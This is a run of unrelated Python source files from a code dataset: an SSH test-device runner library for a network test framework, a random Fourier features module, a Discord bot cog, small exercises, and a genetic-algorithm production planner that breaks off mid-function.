f\"{node_id}{logfile}\"\n )\n for f in local_path.glob(\"*\"):\n if f.is_file():\n self.log_to_ctf(f\"Pushing {f} to CTF path: {dest_path}\")\n if test_action_result_id:\n result = self.ctf_api.save_action_log_file(\n source_file_path=f,\n constructive_path=dest_path,\n test_exe_id=self.test_exe_id,\n test_action_result_id=test_action_result_id,\n )\n else:\n result = self.ctf_api.save_log_file(\n test_exe_id=self.test_exe_id,\n source_file_path=f,\n constructive_path=dest_path,\n )\n if result[\"error\"]:\n success = False\n self.log_to_ctf(result[\"message\"], \"error\")\n if \"error\" in result and result[\"error\"]:\n success = False\n else:\n dest_path = (\n f\"{node_id}/{step}{test_action_result_id}{Path(logfile).parent}\"\n if test_action_result_id\n else f\"{node_id}{Path(logfile).parent}\"\n )\n self.log_to_ctf(f\"Pushing {local_path} to CTF path: {dest_path}\")\n if test_action_result_id:\n result = self.ctf_api.save_action_log_file(\n source_file_path=local_path,\n constructive_path=dest_path,\n test_exe_id=self.test_exe_id,\n test_action_result_id=test_action_result_id,\n )\n else:\n result = self.ctf_api.save_log_file(\n test_exe_id=self.test_exe_id,\n source_file_path=local_path,\n constructive_path=dest_path,\n )\n if result[\"error\"]:\n success = False\n self.log_to_ctf(result[\"message\"], \"error\")\n # Break if log push to ctf fails and store_logs_locally is disabled\n if not success and not self.store_logs_locally:\n break\n if not self.store_logs_locally:\n tmp_dir.cleanup()\n\n return success\n\n def log_to_ctf(self, msg: str, severity: Optional[str] = \"debug\") -> None:\n \"\"\"Record a log message for the current thread.\n\n This will queue the log for CTF, as well as log it locally at a given\n logging level (\"debug\", \"info\", \"warning\", \"error\", \"critical\").\n\n These logs are not pushed here; they are typically pushed to CTF during\n test steps in run_test_steps().\n \"\"\"\n\n if self.thread_local.initialized:\n # Test step execution has started.\n # Note: _run_test_step() initializes self.thread_local.step_idx\n step_idx = self.thread_local.step_idx\n else:\n # Test step execution has not started yet.\n # Tag these logs, and lump them in with logs for test step 1,\n # this ensures that they will get pushed to CTF.\n step_idx = 1\n msg = f\"[pre step 1] {msg}\"\n\n timestamped_msg = (\n f\"[{datetime.datetime.now().replace(microsecond=0).isoformat()}] {msg}\"\n )\n\n if step_idx < 1:\n raise ValueError(f\"Invalid step_idx {step_idx}. See ThreadLocal.\")\n\n with self.ctf_log_lock:\n self.ctf_logs.setdefault(step_idx, []).append(timestamped_msg)\n\n # Also log to the console\n if severity:\n log_method = getattr(logger, severity, None)\n if callable(log_method):\n log_method(msg)\n else:\n logger.warning(\n f\"log_to_ctf() invoked with unknown severity: {severity}\"\n )\n\n def ping_output_to_ctf_table(\n self, ping_summary: str, ping_stats: str, from_node_id: int, dest_ip: str\n ) -> None:\n packets_transmitted = re.search(r\"(\\S+) packets transmitted\", ping_summary)\n if packets_transmitted:\n packets_transmitted = packets_transmitted.group(1)\n packets_received = re.search(r\"(\\S+) received\", ping_summary)\n if packets_received:\n packets_received = packets_received.group(1)\n packet_loss = re.search(r\"(\\S+)% packet loss\", ping_summary)\n if packet_loss:\n packet_loss = packet_loss.group(1)\n time = re.search(r\"time (\\S+)ms\", ping_summary)\n if time:\n time = time.group(1)\n\n stats_min = None\n stats_avg = None\n stats_max = None\n stats_mdev = None\n stats_search = re.search(r\"= (\\S+)/(\\S+)/(\\S+)/(\\S+) ms\", ping_stats)\n if stats_search:\n stats_min = stats_search.group(1)\n stats_avg = stats_search.group(2)\n stats_max = stats_search.group(3)\n stats_mdev = stats_search.group(4)\n\n data_list = [\n {\n \"packets transmitted\": packets_transmitted,\n \"packets received\": packets_received,\n \"packet loss %\": packet_loss,\n \"time ms\": time,\n \"min\": stats_min,\n \"avg\": stats_avg,\n \"max\": stats_max,\n \"mdev\": stats_mdev,\n },\n ]\n data_source = f\"Node {from_node_id} to {dest_ip}\"\n json_data = {\n \"data_source\": data_source,\n \"data_list\": data_list,\n }\n\n json_table_summary = {\n \"title\": \"Ping Summary\",\n \"columns\": \"packets transmitted,packets received,packet loss %,time ms\",\n \"data_source_list\": data_source,\n }\n json_table_stats = {\n \"title\": \"Ping Stats\",\n \"columns\": \"min,avg,max,mdev\",\n \"data_source_list\": data_source,\n }\n\n ctf_json_data_all = {\n \"ctf_tables\": [json_table_summary, json_table_stats],\n \"ctf_data\": [json_data],\n }\n self.save_ctf_json_data(ctf_json_data_all)\n\n def save_ctf_json_data(self, json_data: Dict) -> None:\n \"\"\"Record CTF JSON data for the current test step.\n\n This JSON data is not pushed here; they are typically pushed to CTF during\n test steps in run_test_steps().\n \"\"\"\n\n step_idx = self.thread_local.step_idx\n if step_idx < 1:\n raise ValueError(f\"Invalid step_idx {step_idx}. See ThreadLocal.\")\n\n with self.ctf_json_data_lock:\n self.ctf_json_data[step_idx] = json_data\n\n def save_ctf_test_action_result_with_key(self, key: str, json_object: Dict) -> Dict:\n \"\"\"Record CTF JSON objects for the current test step.\n\n This information is useful to retrieve this test action result in future test runs.\n\n This JSON data is not pushed here; they are typically pushed to CTF during\n test steps in run_test_steps().\n \"\"\"\n\n step_idx = self.thread_local.step_idx\n if step_idx < 1:\n raise ValueError(f\"Invalid step_idx {step_idx}. See ThreadLocal.\")\n\n with self.ctf_keyed_json_objects_lock:\n self.ctf_keyed_json_objects.setdefault(step_idx, []).append(\n {\n \"key\": key,\n \"json_object\": json_object,\n }\n )\n\n def get_ctf_test_action_result_with_key(self, key: str) -> Dict:\n \"\"\"Retrieve CTF JSON object from previous test runs.\"\"\"\n test_action_result_keyed_json = (\n self.ctf_api.get_test_action_result_keyed_json_object(key, self.team_id)\n )\n return test_action_result_keyed_json\n\n def delete_ctf_test_action_result_with_key(self, key: str) -> Dict:\n \"\"\"Delete CTF JSON object from previous test runs.\"\"\"\n with self.ctf_keyed_json_objects_lock:\n self.ctf_api.delete_test_action_result_keyed_json_object(key, self.team_id)\n\n def run_cmd(\n self,\n cmd: str,\n node_ids: Optional[List[int]] = None,\n device_type: str = \"generic\",\n timeout: Optional[int] = None,\n ) -> Dict[Any, int]:\n \"\"\"Run a given command on a list of test devices.\n\n If 'node_ids' is empty, the command will run on all devices of a given\n type.\n\n Returns a map of Future objects to the associated 'node_id'. Typically,\n wait_for_cmds() is invoked on this return value.\n \"\"\"\n futures: Dict = {}\n node_set: Set = set(node_ids or [])\n cmd_timeout: int = timeout if timeout else self.timeout\n\n for node_id, device in self.device_info.items():\n if node_ids:\n if node_id not in node_set:\n continue\n elif device.device_type() != device_type:\n continue\n futures[\n self.thread_pool.submit(\n device.action_custom_command, cmd, cmd_timeout - 1\n )\n ] = node_id\n\n return futures\n\n def wait_for_cmds(\n self, futures: Dict[Any, int], timeout: Optional[int] = None\n ) -> Generator[Dict[str, Any], None, None]:\n \"\"\"Wait for the given commands to finish, after invoking run_cmd().\n\n This yields objects with the following format as each command finishes:\n ```\n {\n \"success\": ,\n \"message\": \"\",\n \"error\": \"\",\n \"node_id\": \n }\n ```\n\n If a connection error is encountered, raises `DeviceCmdError`.\n \"\"\"\n cmd_timeout: int = timeout if timeout else self.timeout\n for future in as_completed(futures.keys(), timeout=cmd_timeout):\n result = future.result()\n node_id = futures[future]\n\n if \"connection_error\" in result and result[\"connection_error\"]:\n raise DeviceCmdError(\n f\"Node {node_id}: Connection failure: {result['message']}\"\n )\n\n yield {\n \"success\": result[\"error\"] == 0 and result[\"returncode\"] == 0,\n \"message\": result[\"message\"],\n \"error\": result[\"error\"] or result[\"stderr\"] or \"\",\n \"node_id\": node_id,\n }\n\n def _thread_main(self, fn, fn_args: Tuple, step_idx: int) -> Any:\n \"\"\"Publish step_idx and execute fn\"\"\"\n self.thread_local.init(step_idx)\n return fn(*fn_args)\n\n def try_until_timeout(\n self, fn, fn_args: Tuple, retry_interval: float, timeout: float\n ) -> None:\n \"\"\"Wrapper for try_until_timeout_noexcept() to generate an exception when it fails.\n Raises: Exception when try_until_timeout_noexcept() returns False.\n \"\"\"\n\n success = self.try_until_timeout_noexcept(\n fn=fn, fn_args=fn_args, retry_interval=retry_interval, timeout=timeout\n )\n if not success:\n raise Exception(f\"try_until_timeout {fn.__name__} | timed out\")\n\n def try_until_timeout_noexcept(\n self, fn, fn_args: Tuple, retry_interval: float, timeout: float\n ) -> bool:\n \"\"\"Repeatedly execute `fn` (a function) until it returns a\n truthy value or None, or until the timeout is reached.\n\n `Exception` raised by `fn` during the retries is ignored.\n The actual max timeout is (timeout + 6 * retry_interval)\n\n Returns: True if `fn` ran successfully\n Raises : nothing\n \"\"\"\n time_left = float(timeout)\n start_time = time.monotonic()\n end_time = start_time + time_left\n while True:\n try:\n future = next(\n as_completed(\n [\n self.thread_pool.submit(\n self._thread_main,\n fn,\n fn_args,\n self.thread_local.step_idx,\n )\n ],\n timeout=time_left,\n )\n )\n ret = future.result()\n if type(ret) is dict:\n success = \"error\" not in ret or str(ret[\"error\"]) == \"0\"\n else:\n success = ret is None or bool(ret)\n if success:\n return True\n except TimeoutError as e:\n self.log_to_ctf(\n f\"try_until_timeout {fn.__name__} | caught {str(e)}\", \"error\"\n )\n return False\n except Exception:\n pass\n\n now = time.monotonic()\n if now > end_time:\n self.log_to_ctf(f\"try_until_timeout {fn.__name__} | timed out\", \"error\")\n return False\n\n elapsed = now - start_time\n self.log_to_ctf(\n f\"try_until_timeout {fn.__name__} | elapsed {elapsed} | retrying in {retry_interval}\"\n )\n time_left = max(timeout - elapsed, 5.0 * retry_interval)\n time.sleep(retry_interval)\n return False\n\n def _test_can_connect(self, connection: SSHConnection) -> bool:\n \"\"\"Try to connect/disconnect a test device.\n\n Return: True if connect/disconnect are both successful.\n\n Note that threads can only disconnect SSHConnection's that\n they established. See ThreadSafeSshConnection in CTF for\n more details.\n \"\"\"\n result = connection.connect()\n if result[\"error\"] != 0:\n return False\n result = connection.disconnect()\n if \"error\" in result and result[\"error\"] != 0:\n logger.error(\n f'_test_can_connect | disconnect failed | f{result[\"message\"]}'\n )\n return False\n return True\n\n def test_can_connect(\n self,\n node_id: int,\n retry_interval: int,\n timeout: int,\n step_idx: Optional[int] = None,\n ) -> bool:\n \"\"\"Repeatedly attempt connect/disconnect to a test device\n\n Return: True if connect/disconnect are both successful\n \"\"\"\n\n if step_idx:\n # We are in a new thread. Publish step_idx in thread local data.\n # See also: ThreadLocal\n self.thread_local.init(step_idx)\n\n device = self.device_info[node_id]\n return self.try_until_timeout_noexcept(\n fn=self._test_can_connect,\n fn_args=(device.connection,),\n retry_interval=retry_interval,\n timeout=timeout,\n )\n\n # TODO This should replace fetch_file, and not reconnect between transfers.\n def fetch_files(\n self,\n node_id: int,\n connection: SSHConnection,\n files: List[str],\n local_tmp_dir: str,\n step_idx: Optional[int] = None,\n ) -> bool:\n \"\"\"Collect the requested files locally\n This will collect files to local_tmp_dir. The local_tmp_dir will be managed by the caller\n \"\"\"\n\n if step_idx:\n # We are in a new thread. Publish step_idx in thread local data.\n # See also: ThreadLocal\n self.thread_local.init(step_idx)\n\n success: bool = True\n logger.info(\n f\"Fetching {files} from node {node_id} to local dir {local_tmp_dir}\"\n )\n\n for file in files:\n # Fetch file from test device\n self.log_to_ctf(f\"Fetching {file} to local dir: {local_tmp_dir}\")\n if not self.fetch_file(connection, local_tmp_dir, file, recursive=True):\n success = False\n\n return success\n\n def fetch_file(\n self,\n connection: SSHConnection,\n local_path: str,\n remote_path: str,\n recursive: bool = True,\n ) -> bool:\n \"\"\"Fetch a file or directory from a test device, and return True upon\n success.\n\n The connection object must be initialized before calling this function.\n \"\"\"\n connection.connect(timeout=self.scp_timeout)\n result: Dict = connection.copy_files_from_remote(\n local_path, remote_path, recursive\n )\n connection.disconnect()\n if result[\"error\"]:\n self.log_to_ctf(\n f\"Failed to fetch remote file '{remote_path}' to '{local_path}': \"\n + f\"{result['message']}\",\n \"error\",\n )\n return False\n return True\n\n def push_file(\n self,\n connection: SSHConnection,\n local_path: str,\n remote_path: str,\n recursive: bool = True,\n step_idx: Optional[int] = None,\n ) -> bool:\n \"\"\"Push a file or directory to a test device, and return True upon\n success.\n\n The connection object must be initialized before calling this function.\n \"\"\"\n\n if step_idx:\n # We are in a new thread. Publish step_idx in thread local data.\n # See also: ThreadLocal\n self.thread_local.init(step_idx)\n\n connection.connect(timeout=self.scp_timeout)\n result: Dict = connection.copy_files_to_remote(\n local_path, remote_path, recursive\n )\n connection.disconnect()\n\n if result[\"error\"]:\n self.log_to_ctf(\n f\"Failed to push local file '{local_path}' to remote path \"\n + f\"'{remote_path}': {result['message']}\",\n \"error\",\n )\n return False\n return True\n\n def push_json_file(\n self, connection: SSHConnection, obj: Dict, remote_path: str\n ) -> bool:\n \"\"\"Push a dictionary as a JSON file to a test device, and return\n True upon success.\n\n The connection object must be initialized before calling this function.\n \"\"\"\n with NamedTemporaryFile(mode=\"w\", delete=False) as ntf:\n ntf_path = Path(ntf.name)\n json.dump(obj, ntf, indent=2, sort_keys=True)\n\n success: bool = False\n try:\n success = self.push_file(\n connection, str(ntf_path), remote_path, recursive=False\n )\n except Exception as e:\n logger.error(f\"{type(e).__name__} - SCP failed: {str(e)}\")\n raise\n finally:\n ntf_path.unlink()\n\n return success\n\n def copy_files_parallel(\n self,\n local_file_path: str,\n remote_file_path: str,\n node_ids: Optional[List[int]] = None,\n ) -> None:\n \"\"\"Copy files/directories to test nodes.\"\"\"\n if not (local_file_path and remote_file_path):\n raise TestUsageError(\"Empty local or remote file paths\")\n\n futures: Dict = {}\n for node_id, device in self.device_info.items():\n if node_ids and node_id not in node_ids:\n continue\n\n self.log_to_ctf(\n f\"Node {node_id}: Copying file from {local_file_path}\"\n + f\" to node: {remote_file_path}\",\n \"info\",\n )\n futures[\n self.thread_pool.submit(\n self.push_file,\n device.connection,\n local_file_path,\n remote_file_path,\n step_idx=self.thread_local.step_idx,\n )\n ] = node_id\n\n for future in as_completed(futures.keys(), timeout=self.scp_timeout):\n result = future.result()\n node_id = futures[future]\n if result:\n self.log_to_ctf(f\"Node {node_id} finished copying files\", \"info\")\n else:\n raise DeviceCmdError(f\"Failed to copy files to node {node_id}\")\n\n @classmethod\n def merge_dict(cls, a: Dict, b: Dict) -> None:\n \"\"\"Recursively merge dictionary 'b' into 'a' in-place.\"\"\"\n for k in b.keys():\n if k in a and isinstance(a[k], dict) and isinstance(b[k], Mapping):\n cls.merge_dict(a[k], b[k])\n else:\n a[k] = b[k]\n\n @classmethod\n def merge_dict_of_lists(cls, a: Dict[Any, List], b: Dict[Any, List]) -> None:\n \"\"\"merge List values of dictionary 'b' into 'a' in-place with unique records\"\"\"\n for k, v in b.items():\n if k in a:\n a[k].extend(v)\n a[k] = list(set(a[k]))\n else:\n a[k] = v\n\n def _load_nodes_data(self, nodes_data_file: str) -> Dict:\n \"\"\"Load a node data file from disk and merge overrides on top.\"\"\"\n # Load node data JSON\n nodes_data: Dict = {}\n if nodes_data_file:\n with open(nodes_data_file) as f:\n logger.info(f\"Loading node data: {nodes_data_file}\")\n nodes_data = json.load(f)\n else:\n self.log_to_ctf(\"No node data file provided\")\n\n device_count = max(len(nodes_data), len(self.device_info))\n\n # Convert string node_ids into integers (JSON only allows string keys)\n nodes_data = {int(key): value for key, value in nodes_data.items()}\n\n # Merge overrides\n self.merge_dict(nodes_data, self.nodes_data_amend(device_count))\n\n # Merge any config overrides from test_args\n self.nodes_data_amend_test_args(nodes_data, device_count)\n\n logger.debug(f\"Using node data ({device_count} devices): {nodes_data}\")\n return nodes_data\n\n def read_nodes_data(self, path, required: bool = True) -> Any:\n \"\"\"Read a value from `self.nodes_data` given a key path.\n\n If a null value is encountered, raises DeviceConfigError if `required`\n is True, otherwise returns None.\n \"\"\"\n d = self.nodes_data\n for k in path:\n if k not in d:\n if required:\n path_str = \".\".join(str(x) for x in path)\n raise DeviceConfigError(\n f\"Required fields are missing from node data: '{path_str}'\"\n )\n else:\n return None\n d = d[k]\n return d\n\n def nodes_data_amend(self, num_nodes: int) -> Dict:\n \"\"\"Get test/setup specific amendments to merge into `self.nodes_data`.\n The amendments have identical structure to `self.nodes_data`\n \"\"\"\n return {}\n\n def nodes_data_amend_test_args(self, nodes_data: Dict, num_nodes: int) -> Dict:\n \"\"\"Get amendments to nodes_data from test_args.\"\"\"\n return nodes_data\n\n @contextmanager\n def _test_manager(self):\n \"\"\"\n Function for intiation and cleanup of test-specific resources\n Sets up a file logging handler so that all logger logs can be accessed at the end of the test run.\n Calls the save_total_logs after test execution is complete\n\n Clears the thread_local vattribute for the next test execution.\n \"\"\"\n with TemporaryDirectory(prefix=\"ctf_\") as templog_dir:\n self.templog_path = path.join(templog_dir, TOTAL_LOGS_FILE_NAME)\n # Add a file handler to the root logger pointing to the templog_path we just created\n root_logger = logging.getLogger()\n file_handler = self._get_log_file_handler(self.templog_path)\n root_logger.addHandler(file_handler)\n # yield the contextmanager\n yield templog_dir\n # will be called on context manager's __exit__\n self.save_total_logs()\n # remove the handler so the next test run (in the event of a test suite) will only use its new handler\n root_logger.removeHandler(file_handler)\n # NamedTemporaryFile's exit is called now and the log file is deleted\n\n # All steps (in all threads) are done - set class ThreadLocal variable 'initialized' to False.\n # This is mostly important for TestSuites where the next test iteration will make use\n # of the class variable and will expect it to not be intialized yet\n self.thread_local.clear()\n\n def save_total_logs(self):\n \"\"\"Save the logger output from the test's duration\"\"\"\n return self.ctf_api.save_total_logs_file(\n source_file_path=self.templog_path,\n constructive_path=TOTAL_LOGS_DIR_NAME,\n test_exe_id=self.test_exe_id,\n )\n\n def _get_log_file_handler(self, log_file_path):\n file_handler = logging.FileHandler(log_file_path)\n file_handler.setFormatter(\n logging.Formatter(\n \"[%(asctime)s] %(levelname)s: %(message)s (%(filename)s:%(lineno)d)\"\n )\n )\n return file_handler\n\n\nclass CtfHelpers:\n \"\"\"CTF API wrappers.\"\"\"\n\n def __init__(self, args: Namespace) -> None:\n # CTF run mode flag. Running in serverless mode or CTF server APIs\n self.serverless = (\n False if not args.serverless else bool(strtobool(args.serverless))\n )\n logger.info(f\"Running in serverless mode = {self.serverless}\")\n\n # Run with or without ctf server\n self.ctf_api = get_ctf_api(serverless=self.serverless)\n\n # Configure serverless variables\n if self.serverless:\n self.ctf_api.set_serverless_config()\n\n def list_test_setups(self, team_id: int) -> List[Any]:\n return cast(List[Any], self.ctf_api.get_list_of_user_team_test_setups(team_id))\n\n def force_free_test_setup(self, test_setup_id: int) -> bool:\n if self.ctf_api.check_if_test_setup_is_free(test_setup_id):\n return True\n else:\n return bool(self.ctf_api.set_test_setup_and_devices_free(test_setup_id))\n\n\nif __name__ == \"__main__\":\n logger.error(\"Do not run directly\")\n","repo_name":"terragraph/terragraph-ctf","sub_path":"ctf/ctf_client/runner/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":65602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22606468680","text":"def create_an_acronym(nimi):\n sanat = nimi.split()\n kirjaimet = []\n for sana in sanat:\n kirjain = sana[0]\n kirjain = kirjain.upper()\n kirjaimet.append(kirjain)\n akronyymi = \"\"\n for kirjain in kirjaimet:\n akronyymi += kirjain\n return akronyymi\n","repo_name":"kkemppi/TIE-courses","sub_path":"Ohjelmointi 1/Ohjelmointi 1/alle 7. krs/akronyymi.py","file_name":"akronyymi.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43688934875","text":"\"\"\"\nCommon functions/classes for the other classes.\nAll classes except 'seed' function is not visible from users.\n\"\"\"\n\nimport functools\n\nimport numpy as np\nimport scipy.stats\n\n\ndef seed(seed):\n \"\"\"\n Fix random seed used in this script.\n\n Args:\n seed (int): Random seed.\n \"\"\"\n # Now it is enough to fix the random seed of Numpy.\n np.random.seed(seed)\n\n\ndef get_rff_matrix(dim_in, dim_out, std):\n \"\"\"\n Generates random matrix of random Fourier features.\n\n Args:\n dim_in (int) : Input dimension of the random matrix.\n dim_out (int) : Output dimension of the random matrix.\n std (float): Standard deviation of the random matrix.\n\n Returns:\n (np.ndarray): Random matrix with shape (dim_out, dim_in).\n \"\"\"\n return std * np.random.randn(dim_in, dim_out)\n\n\ndef get_orf_matrix(dim_in, dim_out, std):\n \"\"\"\n Generates random matrix of orthogonal random features.\n\n Args:\n dim_in (int) : Input dimension of the random matrix.\n dim_out (int) : Output dimension of the random matrix.\n std (float): Standard deviation of the random matrix.\n\n Returns:\n (np.ndarray): Random matrix with shape (dim_out, dim_in).\n \"\"\"\n # Initialize matrix W.\n W = None\n\n for _ in range(dim_out // dim_in + 1):\n s = scipy.stats.chi.rvs(df = dim_in, size = (dim_in, ))\n Q = np.linalg.qr(np.random.randn(dim_in, dim_in))[0]\n V = std * np.dot(np.diag(s), Q)\n W = V if W is None else np.concatenate([W, V], axis = 1)\n\n # Trim unnecessary part.\n return W[:dim_in, :dim_out]\n\n\ndef get_qrf_matrix(dim_in, dim_out, std):\n \"\"\"\n Generates random matrix for quasi-random Fourier features.\n\n Args:\n dim_in (int) : Input dimension of the quasi-random matrix.\n dim_out (int) : Output dimension of the quasi-random matrix.\n std (float): Standard deviation of the quasi-random matrix.\n\n Returns:\n (np.ndarray): Quasi-random matrix with shape (dim_out, dim_in).\n \"\"\"\n # Parameters for quasi random numbers generation.\n QUASI_MC_SKIP = 1000\n QUASI_MC_LEAP = 100\n\n # Implementation of Box-Muller method for converting\n # uniform random sequence to normal random sequence.\n def box_muller_method(xs, ys):\n zs1 = np.sqrt(-2 * np.log(xs)) * np.cos(2 * np.pi * ys)\n zs2 = np.sqrt(-2 * np.log(xs)) * np.sin(2 * np.pi * ys)\n return np.array([zs1, zs2])\n\n # PyTorch is necessary for quasi-random numbers.\n import torch\n\n # Generate sobol sequence engine and throw away the first several values.\n sobol = torch.quasirandom.SobolEngine(dim_in, scramble = True)\n sobol.fast_forward(QUASI_MC_SKIP)\n\n # Generate uniform random matrix.\n W = np.zeros((dim_in, dim_out))\n for index in range(dim_out):\n W[:, index] = sobol.draw(1).numpy()\n sobol.fast_forward(QUASI_MC_LEAP)\n\n # Convert the uniform random matrix to normal random matrix.\n for index in range(0, dim_out, 2):\n W[:, index:index+2] = box_muller_method(W[:, index], W[:, index+1]).T\n\n return std * W\n\n\ndef get_matrix_generator(rand_type, std, dim_kernel):\n \"\"\"\n This function returns a function which generate RFF/ORF matrix.\n The usage of the returned value of this function are:\n f(dim_input:int) -> np.array with shape (dim_input, dim_kernel)\n \"\"\"\n if rand_type == \"rff\": return functools.partial(get_rff_matrix, std = std, dim_out = dim_kernel)\n elif rand_type == \"orf\": return functools.partial(get_orf_matrix, std = std, dim_out = dim_kernel)\n elif rand_type == \"qrf\": return functools.partial(get_qrf_matrix, std = std, dim_out = dim_kernel)\n else : raise RuntimeError(\"matrix_generator: 'rand_type' must be 'rff', 'orf', or 'qrf'.\")\n\n\nclass Base:\n \"\"\"\n Base class of the following RFF/ORF related classes.\n \"\"\"\n def __init__(self, rand_type, dim_kernel, std_kernel, W, b):\n \"\"\"\n Constractor of the Base class.\n Create random matrix generator and random matrix instance.\n\n Args:\n rand_type (str) : Type of random matrix (\"rff\", \"orf\", \"qrf\", etc).\n dim_kernel (int) : Dimension of the random matrix.\n std_kernel (float) : Standard deviation of the random matrix.\n W (np.ndarray): Random matrix for the input `X`. If None then generated automatically.\n b (np.ndarray): Random bias for the input `X`. If None then generated automatically.\n\n Notes:\n If `W` is None then the appropriate matrix will be set just before the training.\n \"\"\"\n self.dim = dim_kernel\n self.s_k = std_kernel\n self.mat = get_matrix_generator(rand_type, std_kernel, dim_kernel)\n self.W = W\n self.b = b\n\n def conv(self, X, index=None):\n \"\"\"\n Applies random matrix to the given input vectors `X` and create feature vectors.\n\n Args:\n X (np.ndarray): Input matrix with shape (n_samples, n_features).\n index (int) : Index of the random matrix. This value should be specified only\n when multiple random matrices are used.\n\n Notes:\n This function can manipulate multiple random matrix. If argument 'index' is given,\n then use self.W[index] as a random matrix, otherwise use self.W itself.\n Also, computation of `ts` is equivarent with ts = X @ W, however, for reducing memory \n consumption, split X to smaller matrices and concatenate after multiplication wit W.\n \"\"\"\n W = self.W if index is None else self.W[index]\n b = self.b if index is None else self.b[index]\n return np.cos(X @ W + b)\n\n def set_weight(self, dim_in):\n \"\"\"\n Set the appropriate random matrix to 'self.W' if 'self.W' is None (i.e. empty).\n\n Args:\n dim_in (int): Input dimension of the random matrix.\n\n Notes:\n This function can manipulate multiple random matrix. If argument 'dim_in' is\n a list/tuple of integers, then generate multiple random matrixes.\n \"\"\"\n # Generate matrix W.\n if self.W is not None : pass\n elif hasattr(dim_in, \"__iter__\"): self.W = tuple([self.mat(d) for d in dim_in])\n else : self.W = self.mat(dim_in)\n\n # Generate vector b.\n if self.b is not None : pass\n elif hasattr(dim_in, \"__iter__\"): self.b = tuple([np.random.uniform(0, 2*np.pi, size=self.W.shape[1]) for _ in dim_in])\n else : self.b = np.random.uniform(0, 2*np.pi, size=self.W.shape[1])\n\n\n# Author: Tetsuya Ishikawa \n# vim: expandtab tabstop=4 shiftwidth=4 fdm=marker\n","repo_name":"tiskw/random-fourier-features","sub_path":"rfflearn/cpu/rfflearn_cpu_common.py","file_name":"rfflearn_cpu_common.py","file_ext":"py","file_size_in_byte":6825,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"76"} +{"seq_id":"32351233087","text":"import disnake\nfrom disnake.ext import commands\nfrom yadps.config.data import Data\nimport yaml\n\n\nclass Resource(commands.Cog):\n data = Data()\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n pass\n\n @commands.slash_command(\n description=\"Send a link in resources channel, will be verified by mods first.\",\n )\n @commands.has_any_role(\n data.memberRoleId\n )\n @commands.cooldown(1, 15*30, commands.BucketType.guild)\n async def resource(self, inter: disnake.ApplicationCommandInteraction, link: str, subject: str):\n embed = disnake.Embed(\n title=inter.author,\n description=f\"Link: {link}\\nSubject: {subject}\\nDate: {inter.created_at.strftime('%d-%m-%y')}\\nTime: {inter.created_at.strftime('%H:%M %p')}\"\n )\n channel = await self.bot.fetch_channel(956780367694659589)\n await channel.send(embed=embed)\n # await inter.send(embed=embed)\n embed = disnake.Embed(\n title=\"Submitted\",\n description=\"Thanks for submitting a resource! It will be posted in the resources channel after being approved.\"\n )\n await inter.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(Resource(bot))\n","repo_name":"pritam42069/yadps-chan","sub_path":"src/yadps/commands/cogs/user/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"41134284837","text":"# https://codeup.kr/problem.php?id=1902\n# 문제 : 정수 n이 주어질 때, 반복문을 사용하지 않고 정수 n부터 1까지 출력하는 재귀함수 설계하기\n\nn = int(input())\n\ndef recursive(num):\n print(num)\n if num > 1:\n recursive(num - 1)\n \nrecursive(n)\n\n# Test Case.\n# 입력 : 10\n# < 출력 >\n# 10\n# 9\n# 8\n# 7\n# 6\n# 5\n# 4\n# 3\n# 2\n# 1","repo_name":"donggrii/python-coding-test","sub_path":"CodeUp/재귀함수/1902_1부터 n까지 역순으로 출력하기.py","file_name":"1902_1부터 n까지 역순으로 출력하기.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8396255920","text":"#Programa: cooperativa_ga_CSV.py\n#Autor: Oclair Prado em mar/2020\n\n# -*- coding: utf-8 -*-\nimport csv,sys\nfrom random import uniform, randint\nimport numpy as np\nimport pandas as pd\nimport time\n\n\nclass Candidate:\n np_dna = np.array([])\n hour = 0 #Restriction\n milk = 0 #Restriction\n profit = 0 #Benefit\n fitness = 0 \n\n def get_hour( self ): \n return self.hour\n\n def get_milk( self ): \n return self.milk\n\n def get_profit( self ): \n return self.profit\n\n def get_fitness( self ):\n return self.fitness\n\n def fitness_evaluation( self, milk_limit, hour_limit, prod_list ):\n if milk_limit <= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if prod_list is None:\n raise ValueError\n\n self.hour = np.sum( self.np_dna * prod_list.np_hours_list )\n self.milk = np.sum( self.np_dna * prod_list.np_milk_list )\n self.profit = np.sum( self.np_dna * prod_list.np_profit_list )\n milk_step = milk_limit - self.milk\n if milk_step < 0:\n milk_step = -10 * milk_step\n \n hour_step = hour_limit - self.hour\n if hour_step < 0:\n hour_step = -10 * hour_step\n\n self.fitness = self.profit - milk_step - hour_step\n \n\n def __init__( self, milk_limit, hour_limit, prod_list ):\n if milk_limit <= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if prod_list is None:\n raise ValueError\n\n dna = []\n tot = len( prod_list.np_hours_list )\n lots_limit = 1 #Mais comum seria usar 1\n\n for pos in range( 0, tot ):\n dna.append( randint( 0, lots_limit ) )\n\n np_dna_new = np.array( dna )\n self.np_dna = np_dna_new\n self.fitness_evaluation( milk_limit, hour_limit, prod_list )\n\n \n\nclass ProductsList:\n np_products_list = np.array( [] ) #Produtcs\n np_milk_list = np.array( [] ) #Restriction\n np_hours_list = np.array( [] ) #Restriction\n np_profit_list = np.array( [] ) #Benefit\n np_selected_products = np.array( [] )\n\n\n def set_selected_products( self, candidate ):\n if candidate is None:\n raise ValueError\n\n self.np_selected_products = candidate.np_dna\n\n\n def get_selected_products( self ):\n response = {}\n #| Prod | Qtd | Milk | Hour | Profit |\n acum_milk = 0\n acum_hours = 0\n acum_profit = 0\n\n column_product_name = \"Produto\"\n column_product = []\n column_qtd_name = \"Qtd\"\n column_qtd = []\n column_milk_name = \"Leite\"\n column_milk = []\n column_hour_name = \"Hora\"\n column_hour = []\n column_profit_name = \"Margem\"\n 